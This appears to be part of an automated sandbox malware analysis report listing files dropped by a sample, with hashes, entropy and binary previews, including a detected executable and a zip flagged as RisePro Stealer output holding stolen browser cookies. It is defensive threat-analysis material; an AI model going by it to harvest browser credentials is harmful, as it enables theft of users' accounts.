                                SHA1:0405475209E094E77F3E1FDE7BB3462891ADC0D1
                                SHA-256:22C66500F1070CBB86FBE9F32F1E70E380E1E8A9F4968C10ED6B7E825FDF4569
                                SHA-512:2367865369600FA90CF13EB423DEA0537D86C1184D399C0490E5C453B45AA9859E6FA0CB06564E482FAFCF6F6FD9615E800D56790CBC14A000764173C6DBB6FE
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.0.8.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4640
                                Entropy (8bit):4.510777873461234
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg77aI9H8WpW8VYTYm8M4J4dFPg+q8jbR2vX3P8d:uIjfbI7917VHJUgMyf8d
                                MD5:FB6C1BF881453BB5B01432E33E6AA279
                                SHA1:115608ECD3EF5249F8E7D706B4AD1A28987BD94E
                                SHA-256:9E8211F27712E3569CDB6DE22D0C6819E68E0EA707E3D7B957A63DE7F8A0DB89
                                SHA-512:91499E35AE585560A73B01EEF3106E3BFD703C6BE3073E47797B3A1B1769036389FBCE27BE12A0AC5D603CDA51AEEF1685B9369B6D844DABA4B6F8B5CD7FE818
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336324" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):468480
                                Entropy (8bit):7.707638639777151
                                Encrypted:false
                                SSDEEP:12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
                                MD5:F14B083F53FEFD0071732BF5C0DCD6FA
                                SHA1:661566E9131C39A1B34CABDE9A14877D9BCB3D90
                                SHA-256:2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                                SHA-512:889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 45%
                                Joe Sandbox View:
                                • Filename: PstCgdvsgB.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...|...|...|..}...|..}...|..}...|..}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):468480
                                Entropy (8bit):7.707638639777151
                                Encrypted:false
                                SSDEEP:12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
                                MD5:F14B083F53FEFD0071732BF5C0DCD6FA
                                SHA1:661566E9131C39A1B34CABDE9A14877D9BCB3D90
                                SHA-256:2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                                SHA-512:889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 45%
                                Joe Sandbox View:
                                • Filename: PstCgdvsgB.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...|...|...|..}...|..}...|..}...|..}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):671895
                                Entropy (8bit):7.997922193587408
                                Encrypted:true
                                SSDEEP:12288:Wcv0SH6dc9+9fcOfF64IYmCgVOUj04CLo5/OV6K5z0Y+QB0ajza2LAe4CWpzblvv:jv16lfJfo4I9CgUUcwmV6iz2anJUzCWn
                                MD5:25FA1BBF328B47BF8BA0DF56F4BEE5B0
                                SHA1:0A5098B86B868415C0E199CAB2A0CE54A6200E7D
                                SHA-256:860FA6FDFD5EB0BD0E7605206A88F47BDBABA8E9AF8C734967C418450A569D21
                                SHA-512:DB73D5B8CBD82CBABAB3947C36D3AC6D9343D3039FB5BA8EE06FA5AB25C9FCDA36B950CC9C964E73DAFA390960525BF993CC4CDF54CCE5FB1DDD3F59D45D940D
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip, Author: Joe Security
                                Preview:PK...........X................Cookies\..PK...........XA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK...........X'...g...........information.txt.X.O.H.~...a.{....o.y:...6.#...=8.&.p..vB..........#.....|3...f.Wq.......d..1y.gi.p.v;..IP.>....0x"\...9.+.p.eg...85.'}..&......AO...&a4.)A..x.$....<.t....]!iO.0.1fL.....6z.....u;g.....Li.2.<.'....}.()...a..2(.}2......3.e...S<....^.O7.8fc...,. 'q..h.....oY.$..f...x.t.y.}Y..G....y~.'.#..p....jGY.o<..|7..G.g..O....Krp.*.i.$.a...F.F.c.'...Qr.g.n..?.. [,W....`.e..............Ra........2.z]."KV.".=.aP...oA:[..zkop..|5O.,...@v......q..&"_.t.e.C..KM".r.W.
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):98304
                                Entropy (8bit):0.08235737944063153
                                Encrypted:false
                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):159744
                                Entropy (8bit):0.5394293526345721
                                Encrypted:false
                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                Malicious:false
                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):5242880
                                Entropy (8bit):0.0357803477377646
                                Encrypted:false
                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                MD5:76D181A334D47872CD2E37135CC83F95
                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                Malicious:false
                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):0.8508558324143882
                                Encrypted:false
                                SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                MD5:933D6D14518371B212F36C3835794D75
                                SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.8553638852307782
                                Encrypted:false
                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                MD5:28222628A3465C5F0D4B28F70F97F482
                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):5242880
                                Entropy (8bit):0.0357803477377646
                                Encrypted:false
                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                MD5:76D181A334D47872CD2E37135CC83F95
                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                Malicious:false
                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):0.6732424250451717
                                Encrypted:false
                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):155648
                                Entropy (8bit):0.5407252242845243
                                Encrypted:false
                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                MD5:7B955D976803304F2C0505431A0CF1CF
                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                Malicious:false
                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):0.8745947603342119
                                Encrypted:false
                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                MD5:378391FDB591852E472D99DC4BF837DA
                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):106496
                                Entropy (8bit):1.136471148832945
                                Encrypted:false
                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                MD5:37B1FC046E4B29468721F797A2BB968D
                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                Malicious:false
                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):106496
                                Entropy (8bit):1.136471148832945
                                Encrypted:false
                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                MD5:37B1FC046E4B29468721F797A2BB968D
                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                Malicious:false
                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.1239949490932863
                                Encrypted:false
                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                MD5:271D5F995996735B01672CF227C81C17
                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):155648
                                Entropy (8bit):0.5407252242845243
                                Encrypted:false
                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                MD5:7B955D976803304F2C0505431A0CF1CF
                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                Malicious:false
                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):106496
                                Entropy (8bit):1.136471148832945
                                Encrypted:false
                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                MD5:37B1FC046E4B29468721F797A2BB968D
                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                Malicious:false
                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):159744
                                Entropy (8bit):0.5394293526345721
                                Encrypted:false
                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                Malicious:false
                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.8553638852307782
                                Encrypted:false
                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                MD5:28222628A3465C5F0D4B28F70F97F482
                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.1239949490932863
                                Encrypted:false
                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                MD5:271D5F995996735B01672CF227C81C17
                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):468480
                                Entropy (8bit):7.707638639777151
                                Encrypted:false
                                SSDEEP:12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
                                MD5:F14B083F53FEFD0071732BF5C0DCD6FA
                                SHA1:661566E9131C39A1B34CABDE9A14877D9BCB3D90
                                SHA-256:2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                                SHA-512:889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 45%
                                Joe Sandbox View:
                                • Filename: PstCgdvsgB.exe, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...|...|...|..}...|..}...|..}...|..}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.1239949490932863
                                Encrypted:false
